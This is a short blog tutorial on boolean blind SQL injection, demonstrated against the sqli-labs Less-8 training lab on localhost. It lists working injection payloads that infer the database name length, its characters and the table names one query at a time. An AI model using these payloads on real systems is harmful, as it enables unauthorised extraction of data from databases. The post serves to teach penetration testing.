congdong007

Penetration Test、Software Developer

0%

Boolean Blind SQL Injection

Posted on Edited on In , , ,

Boolean Blind SQL Injection Method

  1. First, obtain the length of the database name:

    1
    ?id=1' and (length(database()))>n --+

  2. Next, retrieve the database name character by character:

    1
    ?id=1' and (ascii(substr(database(),1,1))>n) --+

    Note: To determine the character at a specific position, you can use a binary search method.
    To obtain the second character of the database name, simply change the position in the “substr” function.

  3. Use Burp Suite’s Intruder module to iterate through the possibilities.

  4. Obtain the number of tables:

    1
    ?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3

  5. Retrieve the length of the tables.
    These steps outline a method for conducting a blind Boolean-based SQL injection to gather information about a database, such as the database name and the number of tables.

Example of Boolean Blind SQL Injection Operation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=1 --+ correct
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and 1=2 --+ error
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3 --+  correct
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 4 --+  error
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>7 --+   correct  database name's length <=8
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (length(database()))>8 --+   error
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>114) --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ascii(substr(database(),1,1))>115) --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 3 --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(*) from information_schema.tables where table_schema='security') > 4 --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 101) --+